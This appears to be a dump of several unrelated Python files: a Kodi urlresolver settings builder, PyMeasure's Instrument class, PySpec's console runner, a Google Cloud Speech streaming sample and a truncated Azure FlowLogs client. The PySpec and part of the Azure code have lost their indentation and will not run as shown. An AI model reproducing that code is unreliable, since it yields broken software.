        '\t<category label="URLResolver">',
        '\t\t<setting default="true" id="allow_universal" label="Enable Universal Resolvers" type="bool"/>',
        '\t\t<setting default="true" id="use_cache" label="Use Function Cache" type="bool"/>',
        '\t\t<setting id="reset_cache" type="action" label="Reset Function Cache" action="RunPlugin(plugin://script.mrknow.urlresolver/?mode=reset_cache)"/>',
        '\t\t<setting id="personal_nid" label="Your NID" type="text" visible="false"/>',
        '\t</category>',
        '\t<category label="Universal Resolvers">']
    # Universal resolvers get their own category, sorted by name.
    resolvers = relevant_resolvers(include_universal=True, include_disabled=True)
    resolvers = sorted(resolvers, key=lambda x: x.name.upper())
    for resolver in resolvers:
        if resolver.isUniversal():
            new_xml.append('\t\t<setting label="%s" type="lsep"/>' % (resolver.name))
            new_xml += ['\t\t' + line for line in resolver.get_settings_xml()]
    new_xml.append('\t</category>')
    new_xml.append('\t<category label="Resolvers 1">')
    # Non-universal resolvers are paginated into categories of at most
    # MAX_SETTINGS lines each ("Resolvers 1", "Resolvers 2", ...).
    i = 0
    cat_count = 2
    for resolver in resolvers:
        if not resolver.isUniversal():
            if i > MAX_SETTINGS:
                new_xml.append('\t</category>')
                new_xml.append('\t<category label="Resolvers %s">' % (cat_count))
                cat_count += 1
                i = 0
            new_xml.append('\t\t<setting label="%s" type="lsep"/>' % (resolver.name))
            res_xml = resolver.get_settings_xml()
            new_xml += ['\t\t' + line for line in res_xml]
            i += len(res_xml) + 1
    new_xml.append('\t</category>')
    new_xml.append('</settings>')
    # Read the previous file (missing/unreadable counts as empty).
    try:
        with open(common.settings_file, 'r') as f:
            old_xml = f.read()
    except:
        old_xml = ''
    new_xml = '\n'.join(new_xml)
    # Only rewrite the file when its content actually changed.
    if old_xml != new_xml:
        common.log_utils.log_debug('Updating Settings XML')
        try:
            with open(common.settings_file, 'w') as f:
                f.write(new_xml)
        except:
            raise
    else:
        common.log_utils.log_debug('No Settings Update Needed')
#_update_settings_xml()
| |
#
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2017 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import logging
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
from pymeasure.adapters.visa import VISAAdapter
from pymeasure.adapters import FakeAdapter
import numpy as np
import inspect
class Instrument(object):
    """ This provides the base class for all Instruments, which is
    independent of the particular Adapter used to connect for
    communication to the instrument. It provides basic SCPI commands
    by default, but can be toggled with :code:`includeSCPI`.
    :param adapter: An :class:`Adapter<pymeasure.adapters.Adapter>` object
    :param name: A string name
    :param includeSCPI: A boolean, which toggles the inclusion of standard SCPI commands
    """
    def __init__(self, adapter, name, includeSCPI=True, **kwargs):
        # An int or str adapter is shorthand for a VISA resource identifier;
        # build the VISAAdapter here. ImportError surfaces when PyVISA is
        # not installed.
        try:
            if isinstance(adapter, (int, str)):
                adapter = VISAAdapter(adapter, **kwargs)
        except ImportError:
            raise Exception("Invalid Adapter provided for Instrument since "
                "PyVISA is not present")
        self.name = name
        self.SCPI = includeSCPI
        self.adapter = adapter
        # Empty namespace object exposed as ``self.get``; nothing in this
        # class populates it -- presumably a hook for subclasses.
        class Object(object):
            pass
        self.get = Object()
        # TODO: Determine case basis for the addition of these methods
        if includeSCPI:
            # Basic SCPI commands
            # NOTE(review): measurement() returns a property object, and
            # properties only act as descriptors when set on a class, not on
            # an instance -- reading self.status here yields the property
            # object itself rather than querying *STB?. Confirm intent.
            self.status = self.measurement("*STB?",
                """ Returns the status of the instrument """)
            self.complete = self.measurement("*OPC?",
                """ TODO: Add this doc """)
        self.isShutdown = False
        log.info("Initializing %s." % self.name)
    @property
    def id(self):
        """ Requests and returns the identification of the instrument. """
        if self.SCPI:
            return self.adapter.ask("*IDN?").strip()
        else:
            # Non-SCPI instruments have no standard identification query.
            return "Warning: Property not implemented."
    # Wrapper functions for the Adapter object
    def ask(self, command):
        """ Writes the command to the instrument through the adapter
        and returns the read response.
        :param command: command string to be sent to the instrument
        """
        return self.adapter.ask(command)
    def write(self, command):
        """ Writes the command to the instrument through the adapter.
        :param command: command string to be sent to the instrument
        """
        self.adapter.write(command)
    def read(self):
        """ Reads from the instrument through the adapter and returns the
        response.
        """
        return self.adapter.read()
    def values(self, command, **kwargs):
        """ Reads a set of values from the instrument through the adapter,
        passing on any key-word arguments.
        """
        return self.adapter.values(command, **kwargs)
    def binary_values(self, command, header_bytes=0, dtype=np.float32):
        """ Reads binary data from the instrument through the adapter.
        :param command: command string to be sent to the instrument
        :param header_bytes: number of header bytes to skip (default 0)
        :param dtype: NumPy dtype used to interpret the data
        """
        return self.adapter.binary_values(command, header_bytes, dtype)
    @staticmethod
    def control(get_command, set_command, docs,
                validator=lambda v, vs: v, values=[], map_values=False,
                get_process=lambda v: v, set_process=lambda v: v,
                check_set_errors=False, check_get_errors=False,
                **kwargs):
        """Returns a property for the class based on the supplied
        commands. This property may be set and read from the
        instrument.
        :param get_command: A string command that asks for the value
        :param set_command: A string command that writes the value
        :param docs: A docstring that will be included in the documentation
        :param validator: A function that takes both a value and a group of valid values
            and returns a valid value, while it otherwise raises an exception
        :param values: A list, range, or dictionary of valid values, that can be used
            as to map values if :code:`map_values` is True.
        :param map_values: A boolean flag that determines if the values should be
            interpreted as a map
        :param get_process: A function that take a value and allows processing
            before value mapping, returning the processed value
        :param set_process: A function that takes a value and allows processing
            before value mapping, returning the processed value
        :param check_set_errors: Toggles checking errors after setting
        :param check_get_errors: Toggles checking errors after getting
        """
        if map_values and type(values) is dict:
            # Prepare the inverse values for performance
            inverse = {v: k for k, v in values.items()}
        def fget(self):
            vals = self.values(get_command, **kwargs)
            if check_get_errors:
                self.check_errors()
            if len(vals) == 1:
                # A single returned value may be mapped back through `values`.
                value = get_process(vals[0])
                if not map_values:
                    return value
                elif type(values) in (list, range):
                    return values[int(value)]
                elif type(values) is dict:
                    return inverse[value]
                else:
                    raise ValueError(
                        'Values of type `{}` are not allowed '
                        'for Instrument.control'.format(type(values))
                    )
            else:
                # Multi-valued responses are processed as a whole, never mapped.
                vals = get_process(vals)
                return vals
        def fset(self, value):
            # Validate first, then process, then (optionally) map to the
            # instrument-side representation before formatting the command.
            value = set_process(validator(value, values))
            if not map_values:
                pass
            elif type(values) in (list, range):
                value = values.index(value)
            elif type(values) is dict:
                value = values[value]
            else:
                raise ValueError(
                    'Values of type `{}` are not allowed '
                    'for Instrument.control'.format(type(values))
                )
            self.write(set_command % value)
            if check_set_errors:
                self.check_errors()
        # Add the specified document string to the getter
        fget.__doc__ = docs
        return property(fget, fset)
    @staticmethod
    def measurement(get_command, docs, values=[], map_values=None,
                    get_process=lambda v: v, command_process=lambda c: c,
                    check_get_errors=False, **kwargs):
        """ Returns a property for the class based on the supplied
        commands. This is a measurement quantity that may only be
        read from the instrument, not set.
        :param get_command: A string command that asks for the value
        :param docs: A docstring that will be included in the documentation
        :param values: A list, range, or dictionary of valid values, that can be used
            as to map values if :code:`map_values` is True.
        :param map_values: A boolean flag that determines if the values should be
            interpreted as a map
        :param get_process: A function that take a value and allows processing
            before value mapping, returning the processed value
        :param command_process: A function that take a command and allows processing
            before executing the command, for both getting and setting
        :param check_get_errors: Toggles checking errors after getting
        """
        if map_values and type(values) is dict:
            # Prepare the inverse values for performance
            inverse = {v: k for k, v in values.items()}
        def fget(self):
            vals = self.values(command_process(get_command), **kwargs)
            if check_get_errors:
                self.check_errors()
            if len(vals) == 1:
                value = get_process(vals[0])
                if not map_values:
                    return value
                elif type(values) in (list, range):
                    return values[int(value)]
                elif type(values) is dict:
                    return inverse[value]
                else:
                    raise ValueError(
                        'Values of type `{}` are not allowed '
                        'for Instrument.measurement'.format(type(values))
                    )
            else:
                return get_process(vals)
        # Add the specified document string to the getter
        fget.__doc__ = docs
        return property(fget)
    @staticmethod
    def setting(set_command, docs,
                validator=lambda x, y: x, values=[], map_values=False,
                check_set_errors=False,
                **kwargs):
        """Returns a property for the class based on the supplied
        commands. This property may be set, but raises an exception
        when being read from the instrument.
        :param set_command: A string command that writes the value
        :param docs: A docstring that will be included in the documentation
        :param validator: A function that takes both a value and a group of valid values
            and returns a valid value, while it otherwise raises an exception
        :param values: A list, range, or dictionary of valid values, that can be used
            as to map values if :code:`map_values` is True.
        :param map_values: A boolean flag that determines if the values should be
            interpreted as a map
        :param check_set_errors: Toggles checking errors after setting
        """
        if map_values and type(values) is dict:
            # Prepare the inverse values for performance
            inverse = {v: k for k, v in values.items()}
        def fget(self):
            # Write-only property: reading is an explicit error.
            raise LookupError("Instrument.setting properties can not be read.")
        def fset(self, value):
            value = validator(value, values)
            if not map_values:
                pass
            elif type(values) in (list, range):
                value = values.index(value)
            elif type(values) is dict:
                value = values[value]
            else:
                raise ValueError(
                    'Values of type `{}` are not allowed '
                    'for Instrument.control'.format(type(values))
                )
            self.write(set_command % value)
            if check_set_errors:
                self.check_errors()
        # Add the specified document string to the getter
        fget.__doc__ = docs
        return property(fget, fset)
    # TODO: Determine case basis for the addition of this method
    def clear(self):
        """ Clears the instrument status byte
        """
        self.write("*CLS")
    # TODO: Determine case basis for the addition of this method
    def reset(self):
        """ Resets the instrument. """
        self.write("*RST")
    def shutdown(self):
        """Brings the instrument to a safe and stable state"""
        self.isShutdown = True
        log.info("Shutting down %s" % self.name)
    def check_errors(self):
        """Return any accumulated errors. Must be reimplemented by subclasses.
        """
        pass
class FakeInstrument(Instrument):
    """Instrument stand-in backed by a :class:`FakeAdapter`.

    Intended for tests: no hardware or VISA layer is involved, and the
    standard SCPI properties are disabled.
    """
    def __init__(self, **kwargs):
        # Route all traffic through the in-memory fake adapter; extra
        # keyword arguments are forwarded to the Instrument base class.
        adapter = FakeAdapter()
        super(FakeInstrument, self).__init__(
            adapter, "Fake Instrument", includeSCPI=False, **kwargs)
| |
# -*- coding: ascii -*-
"""PySpec User Interface for console.
"""
import sys
import time
import optparse
import pyspec
import pyspec.util
import pyspec.project
import pyspec.framework
from pyspec.embedded.setting import config
import pyspec.compat_ironpython as compat
import addin
# NOTE(review): presumably a marker flag read by the PySpec loader to
# recognise framework modules -- confirm against pyspec internals.
__pyspec = 1
# Public API of this module.
__all__ = ("CUISpecTestRunner",)
# Banner text shown by optparse's --version switch.
version = """PySpec Version %s
Copyright (c) 2006-2008 Shibukawa Yoshiki.""" % pyspec.__version__
class CUISetting(object):
    """Configuration container for the console UI.

    The attributes mirror the command line options read by the runner:
    verbosity (-v/-q), color (-c), output_encoding (-e) and
    show_legacy_data (--show-legacy-data).
    """
    def __init__(self):
        # Defaults match the optparse defaults used by the runner.
        self.verbosity = True
        self.show_legacy_data = False
        self.output_encoding = None
        self.color = False
class CUISpecResultRecorder(pyspec.framework.SpecResultRecorder):
"""This class prints formatted CUI test records to a stream.
Used by CUITestRunner.
"""
separator1 = '=' * 70
separator2 = '-' * 70
def __init__(self):
super(CUISpecResultRecorder, self).__init__()
self.out = sys.stdout
self.load_error_specs = set()
self.load_errors = set()
if config.cui.output_encoding:
self.out = compat.get_console_encoder(config.cui.output_encoding)
else:
self.out = sys.stdout
self.starttime = None
def start_test(self, spec, contexts=None, data_args=None):
super(CUISpecResultRecorder, self).start_test(spec, contexts, data_args)
if not config.cui.verbosity:
return
if data_args:
append_text = " <args=%s>" % " ".join(
("%s:%s" % (key, value) for key, value in data_args.iteritems()))
else:
append_text = ""
if contexts is None:
#print str(spec)
self.out.write("\n" + spec.spec_name() + append_text)
else:
for context in contexts:
self.out.write("\n" + context.spec_name(context=True))
self.out.write("\n " + spec.spec_name() + append_text)
self.out.write(" ... ")
def add_success(self, spec):
super(CUISpecResultRecorder, self).add_success(spec)
if config.cui.color:
self.out.write("\x1b[20m")
if config.cui.verbosity:
self.out.write("OK")
else:
self.out.write(".")
if config.cui.color:
self.out.write("\x1b[0m")
def add_error(self, spec, err):
super(CUISpecResultRecorder, self).add_error(spec, err)
if config.cui.verbosity:
self.out.write("Error")
else:
self.out.write("E")
def add_failure(self, spec, err):
super(CUISpecResultRecorder, self).add_failure(spec, err)
if config.cui.verbosity:
self.out.write("Failure")
else:
self.out.write("F")
def add_ignore(self, spec, message=None):
super(CUISpecResultRecorder, self).add_ignore(spec, message)
if config.cui.verbosity:
self.out.write("Ignored")
else:
self.out.write("I")
def add_load_error(self, filepath, error_message):
self.load_error_tests.add(filepath)
self.load_errors.add("".join(error_message))
def has_load_error(self):
return len(self.load_errors) > 0
def begin_test(self):
self.starttime = time.time()
def finish_test(self):
takentime = time.time() - self.starttime
self.print_errors()
print self.separator2
run = self.run_count
print "Ran %d spec%s in %.3fs" % (run, run != 1 and "s" or "", takentime)
if not self.was_successful():
records = []
failed, errored = map(len, (self.failures, self.errors))
if failed:
records.append("failures=%d" % failed)
if errored:
records.append("errors=%d" % errored)
print "FAILED(%s)" % (", ".join(records))
else:
print "OK"
def print_errors(self):
print >>self.out, "\n"
self.print_error_list('ERROR', self.errors)
self.print_error_list('FAIL', self.failures)
self.print_ignore_list()
self.print_load_error()
print >>self.out, "\n"
def print_error_list(self, flavour, errors):
for spec, err in errors:
print >>self.out, self.separator1
print >>self.out, "%s: %s" % (flavour,spec.spec_name(long=True))
print >>self.out, self.separator2
print >>self.out, err
self.print_console(spec)
def print_load_error(self):
if self.load_error_specs:
print >>self.out, self.separator1
print >>self.out, "Load Error:"
for spec in self.load_error_specs:
print >>self.out, " %s" % spec
print >>self.out, self.separator2
for message in self.load_errors:
print >>self.out, message, "\n"
print >>self.out, "No specs ran. Fix syntax errors first."
def print_console(self, spec):
if config.cui.verbosity and spec.console:
print >>self.out, "Console:"
for line in spec.console:
print >>self.out, line[1],
print >>self.out, ""
def print_ignore_list(self):
splitter = ''
for spec, message in self.ignores:
print >>self.out, splitter,
print >>self.out, self.separator1
print >>self.out, "Ignored Tests: %s" % spec.spec_name(long=True)
print >>self.out, self.separator2
if message:
print >>self.out, "%s\n" % message
else:
print >>self.out, ''
self.print_console(spec)
splitter = '\n'
class CUISpecTestRunner(object):
"""A test runner class that displays results in textual form.
It prints out the names of tests as they are run, errors as they
occur, and a summary of the results at the end of the test run.
"""
def __init__(self, auto=False):
self.is_changed = False
self.project = pyspec.project.PySpecProject()
self.auto = auto
self.kernel = pyspec.framework.PySpecKernel()
self.addin = addin.CUIAddinManager(self.kernel)
self.addin.load_addin()
if auto:
self._parse_options_in_auto_mode()
else:
self._parse_options_in_manual_mode()
compat.patch_for_iron_python()
def _run_option_parsing(self, auto_mode, use_ini_file=False):
"""Run option parsing."""
usage = "usage: %prog [options] spec_modules..."
parser = optparse.OptionParser(usage=usage, version=version)
parser.add_option("-v", "--verbose", action="store_true",
dest="verbose", default=True,
help="make lots of information [default].")
parser.add_option("-q", "--quiet", action="store_false",
dest="verbose",
help="ouput progress bar and result only")
parser.add_option("-c", "--color", action="store_true",
dest="color", default=False,
help="color output")
parser.add_option("-d", "--check-docstring", action="store_true",
dest="check_docstring", default=False,
help="verify test fails if the test has no docstring.")
parser.add_option("-r", "--reset-legacy-data", action="store_true",
dest="reset_legacy_data", default=False,
help="reset all legacy test data.")
parser.add_option("--show-legacy-data", action="store_true",
dest="show_legacy_data", default=False,
help="show recorded legacy test data.")
parser.add_option("-g", "--language", metavar="LANG",
default='en',
help="change the report language.(sometimes it needs -e)\n"
"supported code: %s" % ", ".join(config.language.support.keys()))
if use_ini_file:
parser.add_option("-l", "--load", metavar="PROJECT.pyspec",
help="load spec modules and settings from project file")
parser.add_option("-s", "--save", metavar="PROJECT.pyspec",
help="save spec modules and settings to project file")
parser.add_option("-e", "--encode", metavar="OUTPUT_CODEC",
help="set console encode")
parser.add_option("--debug-pyspec", action="store_true",
dest="debug_pyspec", default=False,
help="show pyspec internal error traceback.")
self.addin.call_event_handler("init_optparse", parser)
options, specs = parser.parse_args()
if options.encode is not None:
self.project.cui_encoding = options.encode
if use_ini_file and options.load is not None:
self.is_changed = True
config.framework.check_docstring = options.check_docstring
config.framework.reset_legacy_data = options.reset_legacy_data
config.environment.show_error = options.debug_pyspec
config.language.set_language(options.language)
cui_config = CUISetting()
cui_config.verbosity = options.verbose
cui_config.color = options.color
cui_config.show_legacy_data = options.show_legacy_data
cui_config.output_encoding = options.encode
config.regist_config("cui", cui_config)
if not auto_mode and len(specs) == 0:
parser.print_help()
print "\nThere is no spec."
sys.exit(0)
self.addin.call_event_handler("read_option", options, specs)
return (options, specs)
def _parse_options_in_auto_mode(self):
"""Parse test option in auto mode.
Run spec with run_test() method, pyspec become auto mode.
"""
options, specs = self._run_option_parsing(auto_mode=True)
def _parse_options_in_manual_mode(self):
"""Read test option file.
Run spec with cuipyspec, pyspec become manual mode.
"""
options, specs = self._run_option_parsing(auto_mode=False,
use_ini_file=True)
if options.load is not None:
self.project.read(options.load)
if options.save is not None:
self.project.set_filepath(options.save)
self.is_changed = True
elif options.save is not None:
self.project.set_filepath(options.save)
self.is_changed = True
default_count = len(self.project.specs)
self.project.add_specs(specs)
if default_count != len(self.project.specs) and default_count != 0:
self.is_changed = True
def run(self):
"""Run the given specs.
"""
recorder = CUISpecResultRecorder()
config.load_legacy_test_data()
if config.cui.show_legacy_data:
self._show_legacy_data(recorder.out)
return None
if self.auto:
self.kernel.set_all_modules()
else:
for filepath in self.project.specs.itervalues():
self.kernel.modules.load_module(filepath)
if recorder.has_load_error():
recorder.print_errors()
return
self.addin.call_event_handler("on_run_test")
recorder.begin_test()
for spec_module in self.kernel.modules.get_modules("pyspec"):
spec_module.run(recorder)
recorder.finish_test()
self.addin.call_event_handler("on_finish_test", recorder)
config.save_legacy_test_data()
if self.is_changed:
self.project.save()
return recorder
def _show_legacy_data(self, cout):
keys = sorted(config.runtime.legacy_data.keys())
current_module = None
current_class = None
current_method = None
current_variable = None
for key in keys:
module, class_name, method, variable = key[0:4]
if module != current_module:
print >>cout, self._create_title("module: %s" % module, 1)
current_module = module
if class_name != current_class:
print >>cout, self._create_title("class: %s" % class_name, 2)
current_class = class_name
if method != current_method:
print >>cout, self._create_title("method: %s" % method, 3)
current_method = method
if variable != current_variable:
print >>cout, self._create_title("variable: %s" % variable, 4)
current_variable = variable
for call in config.runtime.legacy_data[key]:
call_repr = pyspec.util.create_method_repr(call[0], *call[1])
if call[2] is not None:
print >>cout, '%s => %s' % (call_repr, call[3])
else:
print >>cout, '%s' % call_repr
def _create_title(self, string, level):
deco1 = '=' * len(string)
deco2 = '-' * len(string)
if level == 1:
return '%s\n%s\n%s\n' % (deco1, string, deco1)
elif level == 2:
return '%s\n%s\n%s\n' % (deco2, string, deco2)
elif level == 3:
return '\n%s\n%s\n' % (string, deco1)
else:
deco = '-' * len(string)
return '\n%s\n%s\n' % (string, deco2)
| |
#!/usr/bin/python
# Copyright (C) 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sample that streams audio to the Google Cloud Speech API via GRPC."""
from __future__ import division
import contextlib
import functools
import re
import signal
import sys
from google.cloud import credentials
from google.cloud.grpc.speech.v1beta1 import cloud_speech_pb2 as cloud_speech
from google.rpc import code_pb2
from grpc.beta import implementations
from grpc.framework.interfaces.face import face
import pyaudio
from six.moves import queue
# Audio recording parameters
RATE = 16000
CHUNK = int(RATE / 10) # 100ms
# The Speech API has a streaming limit of 60 seconds of audio*, so keep the
# connection alive for that long, plus some more to give the API time to figure
# out the transcription.
# * https://g.co/cloud/speech/limits#content
DEADLINE_SECS = 60 * 3 + 5
# OAuth scope required for Cloud Speech requests.
SPEECH_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'
def make_channel(host, port):
    """Creates an SSL channel with auth credentials from the environment.
    :param host: gRPC service hostname (e.g. ``speech.googleapis.com``)
    :param port: TCP port, typically 443
    :return: a secure gRPC channel carrying both SSL and OAuth credentials
    """
    # In order to make an https call, use an ssl channel with defaults
    ssl_channel = implementations.ssl_channel_credentials(None, None, None)
    # Grab application default credentials from the environment
    creds = credentials.get_credentials().create_scoped([SPEECH_SCOPE])
    # Add a plugin to inject the creds into the header
    auth_header = (
        'Authorization',
        'Bearer ' + creds.get_access_token().access_token)
    auth_plugin = implementations.metadata_call_credentials(
        lambda _, cb: cb([auth_header], None),
        name='google_creds')
    # compose the two together for both ssl and google auth
    composite_channel = implementations.composite_channel_credentials(
        ssl_channel, auth_plugin)
    return implementations.secure_channel(host, port, composite_channel)
def _audio_data_generator(buff):
"""A generator that yields all available data in the given buffer.
Args:
buff - a Queue object, where each element is a chunk of data.
Yields:
A chunk of data that is the aggregate of all chunks of data in `buff`.
The function will block until at least one data chunk is available.
"""
stop = False
while not stop:
# Use a blocking get() to ensure there's at least one chunk of data.
data = [buff.get()]
# Now consume whatever other data's still buffered.
while True:
try:
data.append(buff.get(block=False))
except queue.Empty:
break
# `None` in the buffer signals that the audio stream is closed. Yield
# the final bit of the buffer and exit the loop.
if None in data:
stop = True
data.remove(None)
yield b''.join(data)
def _fill_buffer(buff, in_data, frame_count, time_info, status_flags):
    """Continuously collect data from the audio stream, into the buffer.
    PyAudio stream callback: ``buff`` is pre-bound via functools.partial
    in ``record_audio``; the remaining arguments follow the PyAudio
    callback signature.
    """
    buff.put(in_data)
    # (None, paContinue) tells PyAudio to keep the stream running.
    return None, pyaudio.paContinue
# [START audio_stream]
@contextlib.contextmanager
def record_audio(rate, chunk):
    """Opens a recording stream in a context manager.
    Yields a generator (see ``_audio_data_generator``) producing raw audio
    chunks from the microphone. On exit the stream is stopped and closed,
    the generator is signalled to finish via a ``None`` sentinel, and the
    PyAudio interface is terminated.
    :param rate: sampling rate in hertz
    :param chunk: frames per buffer read
    """
    # Create a thread-safe buffer of audio data
    buff = queue.Queue()
    audio_interface = pyaudio.PyAudio()
    audio_stream = audio_interface.open(
        format=pyaudio.paInt16,
        # The API currently only supports 1-channel (mono) audio
        # https://goo.gl/z757pE
        channels=1, rate=rate,
        input=True, frames_per_buffer=chunk,
        # Run the audio stream asynchronously to fill the buffer object.
        # This is necessary so that the input device's buffer doesn't overflow
        # while the calling thread makes network requests, etc.
        stream_callback=functools.partial(_fill_buffer, buff),
    )
    yield _audio_data_generator(buff)
    audio_stream.stop_stream()
    audio_stream.close()
    # Signal the _audio_data_generator to finish
    buff.put(None)
    audio_interface.terminate()
# [END audio_stream]
def request_stream(data_stream, rate, interim_results=True):
    """Yields `StreamingRecognizeRequest`s constructed from a recording audio
    stream.
    Args:
        data_stream: A generator that yields raw audio data to send.
        rate: The sampling rate in hertz.
        interim_results: Whether to return intermediate results, before the
            transcription is finalized.
    Yields:
        One configuration-only request first, then one request per chunk
        of audio produced by `data_stream`.
    """
    # The initial request must contain metadata about the stream, so the
    # server knows how to interpret it.
    recognition_config = cloud_speech.RecognitionConfig(
        # There are a bunch of config options you can specify. See
        # https://goo.gl/KPZn97 for the full list.
        encoding='LINEAR16',  # raw 16-bit signed LE samples
        sample_rate=rate,  # the rate in hertz
        # See http://g.co/cloud/speech/docs/languages
        # for a list of supported languages.
        language_code='en-US',  # a BCP-47 language tag
    )
    streaming_config = cloud_speech.StreamingRecognitionConfig(
        interim_results=interim_results,
        config=recognition_config,
    )
    yield cloud_speech.StreamingRecognizeRequest(
        streaming_config=streaming_config)
    for data in data_stream:
        # Subsequent requests can all just have the content
        yield cloud_speech.StreamingRecognizeRequest(audio_content=data)
def listen_print_loop(recognize_stream):
    """Print transcription responses as they stream in from the server.
    Interim results are written with a trailing carriage return so the
    next (longer or final) result overwrites them in place; final results
    are committed with a newline. Transcribing "exit" or "quit" ends the
    loop.
    """
    print("entered print loop")
    prev_len = 0  # length of the last interim line, used for overwrite padding
    for response in recognize_stream:
        if response.error.code != code_pb2.OK:
            raise RuntimeError('Server error: ' + response.error.message)
        if not response.results:
            continue
        # Only the top alternative of the first result is displayed.
        top = response.results[0]
        transcript = top.alternatives[0].transcript
        if top.is_final:
            print(transcript)
            # Stop listening once a keyword is transcribed.
            if re.search(r'\b(exit|quit)\b', transcript, re.I):
                print('Exiting..')
                break
            prev_len = 0
        else:
            # Pad with spaces so a shorter interim line fully overwrites
            # the previous, longer one before the carriage return.
            pad = ' ' * max(0, prev_len - len(transcript))
            sys.stdout.write(transcript + pad + '\r')
            sys.stdout.flush()
            prev_len = len(transcript)
def main():
    """Stream microphone audio to the Speech API and print transcripts."""
    with cloud_speech.beta_create_Speech_stub(
            make_channel('speech.googleapis.com', 443)) as service:
        # For streaming audio from the microphone, there are three threads.
        # First, a thread that collects audio data as it comes in
        print("entered make_channel")
        with record_audio(RATE, CHUNK) as buffered_audio_data:
            print("entered record_audio")
            # Second, a thread that sends requests with that data
            requests = request_stream(buffered_audio_data, RATE)
            # Third, a thread that listens for transcription responses
            recognize_stream = service.StreamingRecognize(
                requests, DEADLINE_SECS)
            # Exit things cleanly on interrupt
            signal.signal(signal.SIGINT, lambda *_: recognize_stream.cancel())
            # Now, put the transcription responses to use.
            try:
                listen_print_loop(recognize_stream)
                recognize_stream.cancel()
            except face.CancellationError:
                # This happens because of the interrupt handler
                pass
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class FlowLogsOperations(object):
"""FlowLogsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer):
        # All collaborators are injected by the generated service client;
        # this operations group stores them but never constructs them.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    def _create_or_update_initial(
        self,
        resource_group_name,  # type: str
        network_watcher_name,  # type: str
        flow_log_name,  # type: str
        parameters,  # type: "_models.FlowLog"
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.FlowLog"
        """Send the initial PUT request of the create-or-update LRO.
        Returns the deserialized ``FlowLog`` from a 200 or 201 response;
        any other status is mapped to an ``HttpResponseError``.
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.FlowLog"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-08-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self._create_or_update_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
            'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'FlowLog')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
